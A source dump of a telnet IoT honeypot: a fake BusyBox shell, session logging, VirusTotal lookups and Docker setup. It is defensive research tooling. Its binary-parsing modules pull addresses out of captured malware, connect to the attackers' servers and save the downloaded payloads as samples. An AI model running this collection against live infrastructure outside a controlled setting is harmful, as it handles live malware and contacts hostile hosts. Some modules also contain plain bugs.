self.user_agent } 43 | res = self.req("POST", self.url + 'file/scan', files=files, params=params, headers=headers) 44 | json = res.json() 45 | fp.close() 46 | 47 | if json["response_code"] == 1: 48 | return json 49 | else: 50 | return None 51 | 52 | def query_hash_sha256(self, h): 53 | params = { 'apikey': self.api_key, 'resource': h } 54 | headers = { "User-Agent" : self.user_agent } 55 | res = self.req("GET", self.url + "file/report", params=params, headers=headers) 56 | 57 | json = res.json() 58 | 59 | if json["response_code"] == 1: 60 | return json 61 | else: 62 | return None 63 | 64 | def put_comment(self, obj, msg): 65 | res = None 66 | params = { 'apikey': self.api_key, 'resource': obj, "comment": msg } 67 | headers = { "User-Agent" : self.user_agent } 68 | res = self.req("GET", self.url + "comments/put", params=params, headers=headers) 69 | json = res.json() 70 | 71 | if json["response_code"] == 1: 72 | return json 73 | else: 74 | return None 75 | 76 | def get_best_result(self, r): 77 | if r["scans"]: 78 | for e in self.engines: 79 | if r["scans"][e] and r["scans"][e]["detected"]: 80 | return r["scans"][e]["result"] 81 | for e,x in r["scans"].iteritems(): 82 | if x["detected"]: 83 | return x["result"] 84 | return None 85 | else: 86 | return None -------------------------------------------------------------------------------- /backend/virustotal_fill_db.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | from util.dbg import dbg 4 | from virustotal import Virustotal 5 | from sampledb import Sampledb 6 | 7 | vt = Virustotal() 8 | sdb = Sampledb() 9 | 10 | # Engines on vt providing good results 11 | engines = ["DrWeb", "Kaspersky", "ESET-NOD32"] 12 | 13 | def getName(r): 14 | if r["scans"]: 15 | for e in engines: 16 | if r["scans"][e] and r["scans"][e]["detected"]: 17 | return r["scans"][e]["result"] 18 | for e,x in r["scans"].iteritems(): 19 | if x["detected"]: 20 | return x["result"] 21 | return None 22 | else: 23 | return None 24 | 25 | #sdb.sql.execute('ALTER TABLE samples ADD COLUMN result TEXT') 26 | #sdb.sql.commit() 27 | for row in sdb.sql.execute('SELECT id, sha256 FROM samples WHERE result is NULL'): 28 | r = vt.query_hash_sha256(row[1]) 29 | res = str(getName(r)) 30 | print(row[1] + ": " + res) 31 | sdb.sql.execute('UPDATE samples SET result = ? WHERE id = ?', (res, row[0])) 32 | sdb.sql.commit() 33 | 34 | -------------------------------------------------------------------------------- /config.dist.yaml: -------------------------------------------------------------------------------- 1 | # This is the default (distribution) config file 2 | # For local configuration, please create and edit the file "config.yaml", 3 | # this ensures your configuration to endure a update using git pull 4 | 5 | # this file is in YAML format 6 | # If you don't know YAML, check https://de.wikipedia.org/wiki/YAML 7 | # or just copy around existing entries 8 | 9 | ############################################# 10 | # Global config 11 | # used by both honeypot AND backend 12 | 13 | # Credentials for authetification 14 | # Used by honeypot only 15 | # If not set, will be randomly generated 16 | # If the backend cannot find a user with id == 1 in its database, 17 | # it will generate one using this credentials (or the ones autogenerated) 18 | # backend_user: "CHANGEME" 19 | # backend_pass: "CHANGEME" 20 | 21 | ############################################## 22 | # Honeypot configuration 23 | 24 | # Backend URL to which honeypot will connect to to store data 25 | backend: "http://localhost:5000" 26 | 27 | # Write raw data to logfile, can be imported into backend db later 28 | # does include everything EXCEPT sample contents 29 | log_raw: null 30 | 31 | # Save samples in sample_dir 32 | log_samples: False 33 | 34 | # Do not download any samples, use their url as content 35 | # useful for debugging 36 | fake_dl: false 37 | 38 | # Telnet port 39 | telnet_addr: "" 40 | telnet_port: 2323 41 | 42 | # Timeout in seconds for telnet session. Will expire if no bytes can be read from socket. 43 | telnet_session_timeout: 60 44 | 45 | # Maximum session length in seconds. 46 | telnet_max_session_length: 120 47 | 48 | # Minimum time between 2 connection from the same ip, if closer together 49 | # they will be refused 50 | telnet_ip_min_time_between_connections: 30 51 | 52 | ############################################# 53 | # Backend configuration 54 | 55 | # sqlalchemy sql connect string 56 | # examples: 57 | # using sqlite: "sqlite:///database.db" 58 | # using mysql: ""mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME"," 59 | sql: "sqlite:///database.db" 60 | 61 | # IP Address and port for http interface 62 | http_port: 5000 63 | http_addr: "127.0.0.1" 64 | 65 | # Max connections to sql db, maybe restricted in some scenarios 66 | max_db_conn: 1 67 | 68 | # Directory in which samples are stored 69 | sample_dir: "samples" 70 | 71 | # Virustotal API key 72 | vt_key: "GET_YOUR_OWN" 73 | submit_to_vt: false 74 | 75 | # Enable or Disable IP to ASN resolution 76 | # Options: "none" | "offline" | "online" 77 | # offline works by importing data from https://lite.ip2location.com/ - dowload must be done manually 78 | # online works by querying origin.asn.cymru.com 79 | ip_to_asn_resolution: "online" 80 | 81 | cuckoo_enabled: false, 82 | cuckoo_url_base: "http://127.0.0.1:8090" 83 | cuckoo_user: "user" 84 | cuckoo_passwd: "passwd" 85 | cuckoo_force: 0 86 | 87 | -------------------------------------------------------------------------------- /create_config.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -f config.yaml ]; then 4 | echo "config.yaml already exists, aborting" 5 | exit 6 | fi 7 | 8 | user=admin 9 | pass=$(openssl rand -hex 16) 10 | salt=$(openssl rand -hex 16) 11 | 12 | echo "backend_user: $user" >> config.yaml 13 | echo "backend_pass: $pass" >> config.yaml 14 | echo "backend_salt: $salt" >> config.yaml 15 | 16 | -------------------------------------------------------------------------------- /create_docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -f config.yaml ]; then 4 | echo -n "config.yaml already exists, delete it? (Y/n): " 5 | read force 6 | if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then 7 | rm config.yaml 8 | else 9 | echo aborting... 10 | exit 1 11 | fi 12 | fi 13 | 14 | if [ -f docker-compose.yml ]; then 15 | echo -n "docker-compose.yml already exists, delete it? (Y/n): " 16 | read force 17 | if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then 18 | rm docker-compose.yml 19 | else 20 | echo aborting... 21 | exit 1 22 | fi 23 | fi 24 | 25 | echo -n "DB: Use maria or sqlite? (maria/sqlite): " 26 | read dbbackend 27 | if [ "$dbbackend" != "maria" ] && [ "$dbbackend" != "sqlite" ]; then 28 | echo "$dbbackend is not valid" 29 | exit 1 30 | fi 31 | 32 | # Honeypot setup 33 | echo " - Writing honeypot config" 34 | user=admin 35 | pass=$(openssl rand -hex 16) 36 | salt=$(openssl rand -hex 16) 37 | echo "backend_user: $user" >> config.yaml 38 | echo "backend_pass: $pass" >> config.yaml 39 | echo "backend_salt: $salt" >> config.yaml 40 | echo "http_addr: \"0.0.0.0\"" >> config.yaml 41 | echo "telnet_addr: \"0.0.0.0\"" >> config.yaml 42 | echo "backend: \"http://backend:5000\"" >> config.yaml 43 | echo "log_samples: True" >> config.yaml 44 | echo "sample_dir: samples" >> config.yaml 45 | 46 | # DB setup 47 | if [ "$dbbackend" = "maria" ]; then 48 | dbpass=$(openssl rand -hex 16) 49 | sql="mysql+mysqldb://honey:$dbpass@honeydb/honey" 50 | echo sql: \"$sql\" >> config.yaml 51 | fi 52 | 53 | # docker-compose setup 54 | echo " - Writing docker-compose.yml" 55 | cat << EOF >> docker-compose.yml 56 | version: "3.7" 57 | services: 58 | honeypot: 59 | depends_on: 60 | - backend 61 | image: telnet-iot-honeypot:hot 62 | restart: always 63 | entrypoint: 64 | - python 65 | - honeypot.py 66 | ports: 67 | - "2323:2323" 68 | volumes: 69 | - "./samples:/usr/src/app/samples" 70 | backend: 71 | build: . 72 | image: telnet-iot-honeypot:hot 73 | restart: always 74 | entrypoint: 75 | - python 76 | - backend.py 77 | ports: 78 | - "5000:5000" 79 | volumes: 80 | - "./samples:/usr/src/app/samples" 81 | EOF 82 | 83 | if [ "$dbbackend" = "maria" ]; then 84 | cat << EOF >> docker-compose.yml 85 | depends_on: 86 | - honeydb 87 | honeydb: 88 | image: mariadb:latest 89 | restart: always 90 | environment: 91 | MYSQL_RANDOM_ROOT_PASSWORD: "yes" 92 | MYSQL_DATABASE: honey 93 | MYSQL_USER: honey 94 | MYSQL_PASSWORD: $dbpass 95 | EOF 96 | fi 97 | 98 | echo -n "Start honeypot using docker-compose now? d = start using daemon flag (Y/n/d): " 99 | read runit 100 | if [ "$runit" = "d" ]; then 101 | sudo docker-compose up -d 102 | elif [ "$runit" = "Y" ] || [ "$runit" = "y" ] || [ "$runit" = "" ]; then 103 | sudo docker-compose up 104 | fi 105 | 106 | -------------------------------------------------------------------------------- /honeypot.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import signal 4 | import json 5 | import socket 6 | 7 | from honeypot.telnet import Telnetd 8 | from honeypot.client import Client 9 | from honeypot.session import Session 10 | from honeypot.shell.shell import test_shell 11 | 12 | from util.dbg import dbg 13 | from util.config import config 14 | 15 | srv = None 16 | 17 | def import_file(fname): 18 | with open(fname, "rb") as fp: 19 | client = Client() 20 | for line in fp: 21 | line = line.strip() 22 | obj = json.loads(line) 23 | if obj["type"] == "connection": 24 | if obj["ip"] != None: 25 | print "conn " + obj["ip"] 26 | client.put_session(obj) 27 | if obj["type"] == "sample": 28 | print "sample " + obj["sha256"] 29 | client.put_sample_info(obj) 30 | 31 | def rerun_file(fname): 32 | with open(fname, "rb") as fp: 33 | for line in fp: 34 | line = line.strip() 35 | obj = json.loads(line) 36 | if obj["type"] == "connection": 37 | if obj["ip"] == None: continue 38 | session = Session(sys.stdout.write, obj["ip"]) 39 | session.login(obj["user"], obj["pass"]) 40 | for event in obj["stream"]: 41 | if not(event["in"]): continue 42 | sys.stdout.write(event["data"]) 43 | session.shell(event["data"].strip()) 44 | session.end() 45 | 46 | 47 | def signal_handler(signal, frame): 48 | dbg('Ctrl+C') 49 | srv.stop() 50 | 51 | if not os.path.exists("samples"): 52 | os.makedirs("samples") 53 | 54 | if __name__ == "__main__": 55 | action = None 56 | configFile = None 57 | 58 | i = 0 59 | while i+1 < len(sys.argv): 60 | i += 1 61 | arg = sys.argv[i] 62 | 63 | if arg == "-c": 64 | if i+1 < len(sys.argv): 65 | configFile = sys.argv[i+1] 66 | print "Using config file " + configFile 67 | i += 1 68 | continue 69 | else: 70 | print "warning: expected argument after \"-c\"" 71 | else: 72 | action = arg 73 | 74 | if configFile: 75 | config.loadUserConfig(configFile) 76 | 77 | if action == None: 78 | socket.setdefaulttimeout(15) 79 | 80 | srv = Telnetd(config.get("telnet_addr"), config.get("telnet_port")) 81 | signal.signal(signal.SIGINT, signal_handler) 82 | srv.run() 83 | elif action == "import": 84 | fname = sys.argv[2] 85 | import_file(fname) 86 | elif action == "rerun": 87 | fname = sys.argv[2] 88 | rerun_file(fname) 89 | elif action == "shell": 90 | test_shell() 91 | else: 92 | print "Command " + action + " unknown." 93 | 94 | -------------------------------------------------------------------------------- /honeypot/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/honeypot/__init__.py -------------------------------------------------------------------------------- /honeypot/__main__.py: -------------------------------------------------------------------------------- 1 | import signal 2 | 3 | from telnet import Telnetd 4 | from util.dbg import dbg 5 | 6 | def signal_handler(signal, frame): 7 | dbg('Ctrl+C') 8 | srv.stop() 9 | 10 | signal.signal(signal.SIGINT, signal_handler) 11 | 12 | srv = Telnetd(2222) 13 | srv.run() -------------------------------------------------------------------------------- /honeypot/client.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import requests.exceptions 3 | import requests.auth 4 | 5 | import json 6 | 7 | from util.dbg import dbg 8 | from util.config import config 9 | 10 | class Client: 11 | 12 | def __init__(self): 13 | self.user = config.get("backend_user") 14 | self.password = config.get("backend_pass") 15 | self.url = config.get("backend") 16 | self.auth = requests.auth.HTTPBasicAuth(self.user, self.password) 17 | 18 | self.test_login() 19 | 20 | def test_login(self): 21 | try: 22 | r = requests.get(self.url + "/connections", auth=self.auth, timeout=20.0) 23 | except: 24 | raise IOError("Cannot connect to backend") 25 | try: 26 | r = requests.get(self.url + "/login", auth=self.auth, timeout=20.0) 27 | if r.status_code != 200: 28 | raise IOError() 29 | except: 30 | raise IOError("Backend authentification test failed, check config.json") 31 | 32 | def put_session(self, session, retry=True): 33 | 34 | try: 35 | r = requests.put(self.url + "/conns", auth=self.auth, json=session, timeout=20.0) 36 | except requests.exceptions.RequestException: 37 | dbg("Cannot connect to backend") 38 | return [] 39 | 40 | if r.status_code == 200: 41 | return r.json() 42 | elif retry: 43 | msg = r.raw.read() 44 | dbg("Backend upload failed, retrying (" + str(msg) + ")") 45 | return self.put_session(session, False) 46 | else: 47 | msg = r.raw.read() 48 | raise IOError(msg) 49 | 50 | def put_sample(self, data, retry=True): 51 | 52 | try: 53 | r = requests.post(self.url + "/file", auth=self.auth, data=data, timeout=20.0) 54 | except requests.exceptions.RequestException: 55 | dbg("Cannot connect to backend") 56 | return 57 | 58 | if r.status_code == 200: 59 | return 60 | elif retry: 61 | msg = r.raw.read() 62 | dbg("Backend upload failed, retrying (" + str(msg) + ")") 63 | return self.put_sample(sha256, filename, False) 64 | else: 65 | msg = r.raw.read() 66 | raise IOError(msg) 67 | 68 | -------------------------------------------------------------------------------- /honeypot/sampledb_client.py: -------------------------------------------------------------------------------- 1 | import client 2 | import time 3 | import traceback 4 | import os 5 | import requests 6 | import hashlib 7 | import json 8 | 9 | from util.dbg import dbg 10 | from util.config import config 11 | 12 | BACKEND = None 13 | 14 | def get_backend(): 15 | global BACKEND 16 | 17 | if BACKEND != None: 18 | return BACKEND 19 | elif config.get("backend", optional=True) != None: 20 | BACKEND = client.Client() 21 | return BACKEND 22 | else: 23 | return None 24 | 25 | def sha256(data): 26 | h = hashlib.sha256() 27 | h.update(data) 28 | return h.hexdigest() 29 | 30 | class SampleRecord: 31 | 32 | def __init__(self, url, name, info, data): 33 | self.url = url 34 | self.name = name 35 | self.date = int(time.time()) 36 | self.info = info 37 | self.data = data 38 | if data: 39 | self.sha256 = sha256(data) 40 | self.length = len(data) 41 | else: 42 | self.sha256 = None 43 | self.length = None 44 | 45 | def json(self): 46 | return { 47 | "type": "sample", 48 | "url": self.url, 49 | "name": self.name, 50 | "date": self.date, 51 | "sha256": self.sha256, 52 | "info": self.info, 53 | "length": self.length 54 | } 55 | 56 | class SessionRecord: 57 | 58 | def __init__(self): 59 | self.back = get_backend() 60 | self.logfile = config.get("log_raw", optional=True) 61 | self.log_samples = config.get("log_samples", optional=True, default=False) 62 | self.sample_dir = config.get("sample_dir", optional=not(self.log_samples)) 63 | 64 | self.urlset = {} 65 | 66 | self.ip = None 67 | self.user = None 68 | self.password = None 69 | self.date = None 70 | self.urls = [] 71 | self.stream = [] 72 | 73 | def log_raw(self, obj): 74 | if self.logfile != None: 75 | with open(self.logfile, "ab") as fp: 76 | fp.write(json.dumps(obj).replace("\n", "") + "\n") 77 | 78 | 79 | def json(self): 80 | return { 81 | "type" : "connection", 82 | "ip" : self.ip, 83 | "user" : self.user, 84 | "pass" : self.password, 85 | "date" : self.date, 86 | "stream" : self.stream, 87 | "samples" : map(lambda sample: sample.json(), self.urls), 88 | } 89 | 90 | def addInput(self, text): 91 | self.stream.append({ 92 | "in": True, 93 | "ts": round((time.time() - self.date) * 1000) / 1000, 94 | "data": text.decode('ascii', 'ignore') 95 | }) 96 | 97 | def addOutput(self, text): 98 | self.stream.append({ 99 | "in": False, 100 | "ts": round((time.time() - self.date) * 1000) / 1000, 101 | "data": text.decode('ascii', 'ignore') 102 | }) 103 | 104 | def set_login(self, ip, user, password): 105 | self.ip = ip 106 | self.user = user 107 | self.password = password 108 | self.date = int(time.time()) 109 | 110 | def add_file(self, data, url=None, name=None, info=None): 111 | if url == None: 112 | shahash = sha256(data) 113 | # Hack, must be unique somehow, so just use the hash ..." 114 | url = "telnet://" + self.ip + "/" + shahash[0:8] 115 | if name == None: 116 | name = url.split("/")[-1].strip() 117 | 118 | sample = SampleRecord(url, name, info, data) 119 | self.urlset[url] = sample 120 | self.urls.append(sample) 121 | 122 | def commit(self): 123 | self.log_raw(self.json()) 124 | 125 | if self.log_samples: 126 | for sample in self.urls: 127 | if sample.data: 128 | fp = open(self.sample_dir + "/" + sample.sha256, "wb") 129 | fp.write(sample.data) 130 | fp.close() 131 | 132 | # Ignore connections without any input 133 | if len(self.stream) > 1 and self.back != None: 134 | upload_req = self.back.put_session(self.json()) 135 | 136 | 137 | -------------------------------------------------------------------------------- /honeypot/session.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import time 4 | import json 5 | import traceback 6 | 7 | import struct 8 | import socket 9 | import select 10 | import errno 11 | 12 | from util.dbg import dbg 13 | from util.config import config 14 | 15 | from sampledb_client import SessionRecord 16 | 17 | from shell.shell import Env, run 18 | 19 | MIN_FILE_SIZE = 128 20 | PROMPT = " # " 21 | 22 | class Session: 23 | def __init__(self, output, remote_addr): 24 | dbg("New Session") 25 | self.output = output 26 | 27 | self.remote_addr = remote_addr 28 | self.record = SessionRecord() 29 | self.env = Env(self.send_string) 30 | 31 | self.env.listen("download", self.download) 32 | 33 | # Files already commited 34 | self.files = [] 35 | 36 | def login(self, user, password): 37 | dbg("Session login: user=" + user + " password=" + password) 38 | self.record.set_login(self.remote_addr, user, password) 39 | 40 | self.send_string(PROMPT) 41 | 42 | def download(self, data): 43 | path = data["path"] 44 | url = data["url"] 45 | info = data["info"] 46 | data = data["data"] 47 | 48 | dbg("Downloaded " + url + " to " + path) 49 | 50 | if data: 51 | self.record.add_file(data, url=url, name=path, info=info) 52 | self.files.append(path) 53 | else: 54 | self.record.add_file(None, url=url, name=path, info=info) 55 | 56 | def found_file(self, path, data): 57 | if path in self.files: 58 | pass 59 | else: 60 | if len(data) > MIN_FILE_SIZE: 61 | dbg("File created: " + path) 62 | self.record.add_file(data, name=path) 63 | else: 64 | dbg("Ignore small file: " + path + " (" + str(len(data)) + ") bytes") 65 | 66 | 67 | def end(self): 68 | dbg("Session End") 69 | 70 | for path in self.env.files: 71 | self.found_file(path, self.env.files[path]) 72 | 73 | for (path, data) in self.env.deleted: 74 | self.found_file(path, data) 75 | 76 | self.record.commit() 77 | 78 | def send_string(self, text): 79 | self.record.addOutput(text) 80 | self.output(text) 81 | 82 | def shell(self, l): 83 | self.record.addInput(l + "\n") 84 | 85 | try: 86 | tree = run(l, self.env) 87 | except: 88 | dbg("Could not parse \""+l+"\"") 89 | self.send_string("sh: syntax error near unexpected token `" + " " + "'\n") 90 | traceback.print_exc() 91 | 92 | self.send_string(PROMPT) 93 | 94 | -------------------------------------------------------------------------------- /honeypot/shell/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/honeypot/shell/__init__.py -------------------------------------------------------------------------------- /honeypot/shell/commands/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Phype/telnet-iot-honeypot/5d32829a36b5bcd369e47d9225f7a88dfdcfe490/honeypot/shell/commands/__init__.py -------------------------------------------------------------------------------- /honeypot/shell/commands/base.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import traceback 3 | 4 | from binary import run_binary 5 | 6 | class Proc: 7 | procs = {} 8 | 9 | @staticmethod 10 | def register(name, obj): 11 | Proc.procs[name] = obj 12 | 13 | @staticmethod 14 | def get(name): 15 | if name in Proc.procs: 16 | return Proc.procs[name] 17 | else: 18 | return None 19 | 20 | class StaticProc(Proc): 21 | def __init__(self, output, result=0): 22 | self.output = output 23 | self.result = result 24 | 25 | def run(self, env, args): 26 | env.write(self.output) 27 | return self.result 28 | 29 | class FuncProc(Proc): 30 | def __init__(self, func): 31 | self.func = func 32 | 33 | def run(self, env, args): 34 | env.write(self.func(args)) 35 | return 0 36 | 37 | # Basic Procs 38 | 39 | class Exec(Proc): 40 | 41 | def run(self, env, args): 42 | if len(args) == 0: 43 | return 0 44 | 45 | if args[0][0] == ">": 46 | name = "true" 47 | elif args[0].startswith("./"): 48 | fname = args[0][2:] 49 | fdata = env.readFile(fname) 50 | 51 | if fdata == None: 52 | env.write("sh: 1: ./" + fname + ": not found\n") 53 | return 1 54 | else: 55 | run_binary(fdata, fname, args[1:], env) 56 | return 0 57 | else: 58 | name = args[0] 59 | args = args[1:] 60 | 61 | # $path = /bin/ 62 | if name.startswith("/bin/"): 63 | name = name[5:] 64 | 65 | if Proc.get(name): 66 | try: 67 | return Proc.get(name).run(env, args) 68 | except: 69 | traceback.print_exc() 70 | env.write("Segmention fault\n") 71 | return 1 72 | else: 73 | env.write(name + ": command not found\n") 74 | return 1 75 | 76 | class BusyBox(Proc): 77 | 78 | def run(self, env, args): 79 | 80 | if len(args) == 0: 81 | env.write("""BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary. 82 | BusyBox is copyrighted by many authors between 1998-2015. 83 | Licensed under GPLv2. See source distribution for detailed 84 | copyright notices. 85 | 86 | Usage: busybox [function [arguments]...] 87 | 88 | Currently defined functions: 89 | """ + " ".join(Proc.procs.keys()) + "\n\n") 90 | return 0 91 | 92 | name = args[0] 93 | args = args[1:] 94 | if Proc.get(name): 95 | return Proc.get(name).run(env, args) 96 | else: 97 | env.write(name + ": applet not found\n") 98 | return 1 99 | 100 | class Cat(Proc): 101 | 102 | def run(self, env, args): 103 | fname = args[0] 104 | string = env.readFile(fname) 105 | if string != None: 106 | env.write(string) 107 | return 0 108 | else: 109 | env.write("cat: " + fname + ": No such file or directory\n") 110 | return 1 111 | 112 | class Echo(Proc): 113 | 114 | def run(self, env, args): 115 | opts = "" 116 | if args[0][0] == "-": 117 | opts = args[0][1:] 118 | args = args[1:] 119 | 120 | string = " ".join(args) 121 | if "e" in opts: 122 | string = string.decode('string_escape') 123 | 124 | env.write(string) 125 | 126 | if not("n" in opts): 127 | env.write("\n") 128 | 129 | return 0 130 | 131 | class Rm(Proc): 132 | 133 | def run(self, env, args): 134 | if args[0] in env.listfiles(): 135 | env.deleteFile(args[0]) 136 | return 0 137 | else: 138 | env.write("rm: cannot remove '" + args[0] + "': No such file or directory\n") 139 | return 1 140 | 141 | class Ls(Proc): 142 | 143 | def run(self, env, args): 144 | for f in env.listfiles().keys(): 145 | env.write(f + "\n") 146 | return 0 147 | 148 | class Dd(Proc): 149 | 150 | def run(self, env, args): 151 | infile = None 152 | outfile = None 153 | count = None 154 | bs = 512 155 | for a in args: 156 | if a.startswith("if="): 157 | infile = a[3:] 158 | if a.startswith("of="): 159 | outfile = a[3:] 160 | if a.startswith("count="): 161 | count = int(a[6:]) 162 | if a.startswith("bs="): 163 | bs = int(a[3:]) 164 | 165 | if infile != None: 166 | data = env.readFile(infile) 167 | if count != None: 168 | data = data[0:(count*bs)] 169 | if outfile: 170 | env.deleteFile(infile) 171 | env.writeFile(infile, data) 172 | else: 173 | env.write(data) 174 | 175 | env.write("""0+0 records in 176 | 0+0 records out 177 | 0 bytes copied, 0 s, 0,0 kB/s\n""") 178 | return 0 179 | 180 | class Cp(Proc): 181 | 182 | def run(self, env, args): 183 | infile = args[0] 184 | outfile = args[1] 185 | 186 | data = env.readFile(infile) 187 | if data != None: 188 | env.writeFile(outfile, data) 189 | return 0 190 | else: 191 | env.write("cp: cannot stat '" + infile + "': No such file or directory\n") 192 | return 1 193 | 194 | Proc.register("cp", Cp()) 195 | Proc.register("ls", Ls()) 196 | Proc.register("cat", Cat()) 197 | Proc.register("dd", Dd()) 198 | Proc.register("rm", Rm()) 199 | Proc.register("echo", Echo()) 200 | Proc.register("busybox", BusyBox()) 201 | Proc.register("exec", Exec()) 202 | 203 | Proc.register("cd", StaticProc("")) 204 | Proc.register("true", StaticProc("")) 205 | Proc.register("chmod", StaticProc("")) 206 | Proc.register("uname", StaticProc("")) 207 | Proc.register(":", StaticProc("")) 208 | Proc.register("ps", StaticProc( 209 | """ PID TTY TIME CMD 210 | 6467 pts/0 00:00:00 sh 211 | 12013 pts/0 00:00:00 ps\n""")) 212 | 213 | # Other files 214 | 215 | from wget import Wget 216 | from shell import Shell 217 | 218 | # tftp disabled 219 | #from tftp import Tftp 220 | 221 | 222 | -------------------------------------------------------------------------------- /honeypot/shell/commands/binary.py: -------------------------------------------------------------------------------- 1 | 2 | import socket 3 | import struct 4 | import select 5 | 6 | def dbg(s): 7 | print s 8 | 9 | def run_binary(data, fname, args, env): 10 | dbg("Parsing binary file " + fname + " (" + str(len(data)) + " bytes)") 11 | 12 | socks = [] 13 | tuples = [] 14 | pos = 0 15 | while True: 16 | pos = data.find("\x02\x00", pos) 17 | if pos == -1: break 18 | 19 | sockaddr = data[pos:pos+8] 20 | sockaddr = struct.unpack(">HHBBBB", sockaddr) 21 | pos += 8 22 | 23 | # Ignore ip addresses starting with 0 or > 224 (multicast) 24 | if (sockaddr[2] == 0 or sockaddr[2] >= 224): 25 | continue 26 | 27 | ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5]) 28 | port = sockaddr[1] 29 | tuples.append((ip, port)) 30 | 31 | for addr in tuples: 32 | try: 33 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 34 | s.settimeout(15) 35 | s.setblocking(0) 36 | s.connect_ex(addr) 37 | socks.append(s) 38 | dbg("Trying tcp://" + addr[0] + ":" + str(addr[1])) 39 | except: 40 | pass 41 | 42 | goodsocket = None 43 | data = None 44 | url = None 45 | while len(socks) > 0: 46 | read, a, b = select.select(socks, [], [], 15) 47 | if len(read) == 0: break 48 | for s in read: 49 | if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0: 50 | try: 51 | s.setblocking(1) 52 | data = s.recv(1024) 53 | goodsocket = s 54 | peer = s.getpeername() 55 | url = "tcp://" + peer[0] + ":" + str(peer[1]) 56 | dbg("Connected to " + url) 57 | break 58 | except: 59 | s.close() 60 | socks.remove(s) 61 | else: 62 | s.close() 63 | socks.remove(s) 64 | if goodsocket != None: 65 | break 66 | 67 | for s in socks: 68 | if s != goodsocket: 69 | s.close() 70 | 71 | if goodsocket == None: 72 | dbg("Could not connect.\n") 73 | #for addr in tuples: 74 | # env.write(tuples[0] + ":" + tuples[1] + "\n") 75 | return 1 76 | 77 | while True: 78 | r = goodsocket.recv(1024) 79 | if r != "": 80 | data += r 81 | else: 82 | break 83 | 84 | goodsocket.close() 85 | 86 | # Normally these stub downloaders will output to stdout 87 | env.write(data) 88 | 89 | env.action("download", { 90 | "url": url, 91 | "path": "(stdout)", 92 | "info": "", 93 | "data": data 94 | }) 95 | 96 | return 0 97 | -------------------------------------------------------------------------------- /honeypot/shell/commands/cmd_util.py: -------------------------------------------------------------------------------- 1 | from getopt import gnu_getopt, GetoptError 2 | 3 | def easy_getopt(args, opt, longopts=[]): 4 | optlist, args = gnu_getopt(args, opt, longopts) 5 | optdict = {} 6 | 7 | for item in optlist: 8 | optdict[item[0]] = item[1] 9 | 10 | return optdict, args 11 | 12 | -------------------------------------------------------------------------------- /honeypot/shell/commands/shell.py: -------------------------------------------------------------------------------- 1 | from base import Proc 2 | 3 | class Shell(Proc): 4 | 5 | def run(self, env, args): 6 | from honeypot.shell.shell import run 7 | 8 | if len(args) == 0: 9 | env.write("Busybox built-in shell (ash)\n") 10 | return 0 11 | 12 | fname = args[0] 13 | contents = env.readFile(fname) 14 | 15 | if contents == None: 16 | env.write("sh: 0: Can't open " + fname) 17 | return 1 18 | else: 19 | shell = Proc.get("exec") 20 | for line in contents.split("\n"): 21 | line = line.strip() 22 | line = line.split("#")[0] 23 | run(line, env) 24 | return 0 25 | 26 | Proc.register("sh", Shell()) 27 | -------------------------------------------------------------------------------- /honeypot/shell/commands/shellcode.py: -------------------------------------------------------------------------------- 1 | 2 | from base import Proc 3 | 4 | class Shellcode(): 5 | 6 | def run(self, data): 7 | dbg("Parsing stub downloader (" + str(len(data)) + " bytes)") 8 | 9 | socks = [] 10 | tuples = [] 11 | pos = 0 12 | while True: 13 | pos = data.find("\x02\x00", pos) 14 | if pos == -1: break 15 | 16 | sockaddr = data[pos:pos+8] 17 | sockaddr = struct.unpack(">HHBBBB", sockaddr) 18 | 19 | ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5]) 20 | port = sockaddr[1] 21 | tuples.append((ip, port)) 22 | pos += 8 23 | 24 | for addr in tuples: 25 | try: 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.settimeout(15) 28 | s.setblocking(0) 29 | s.connect_ex(addr) 30 | socks.append(s) 31 | dbg("Trying tcp://" + addr[0] + ":" + str(addr[1])) 32 | except: 33 | pass 34 | 35 | goodsocket = None 36 | data = None 37 | url = None 38 | while len(socks) > 0: 39 | read, a, b = select.select(socks, [], [], 15) 40 | if len(read) == 0: break 41 | for s in read: 42 | if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0: 43 | try: 44 | s.setblocking(1) 45 | data = s.recv(1024) 46 | goodsocket = s 47 | peer = s.getpeername() 48 | url = "tcp://" + peer[0] + ":" + str(peer[1]) 49 | dbg("Connected to " + url) 50 | break 51 | except: 52 | s.close() 53 | socks.remove(s) 54 | else: 55 | s.close() 56 | socks.remove(s) 57 | if goodsocket != None: 58 | break 59 | 60 | for s in socks: 61 | if s != goodsocket: 62 | s.close() 63 | 64 | if goodsocket == None: 65 | dbg("Could not connect to any addresses in binary.") 66 | return 67 | 68 | while True: 69 | r = goodsocket.recv(1024) 70 | if r != "": 71 | data += r 72 | else: 73 | break 74 | 75 | goodsocket.close() 76 | self.record.add_file(data, url=url) 77 | -------------------------------------------------------------------------------- /honeypot/shell/commands/tftp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import io 4 | import traceback 5 | 6 | from getopt import gnu_getopt, GetoptError 7 | from tftpy import TftpClient 8 | 9 | from cmd_util import easy_getopt 10 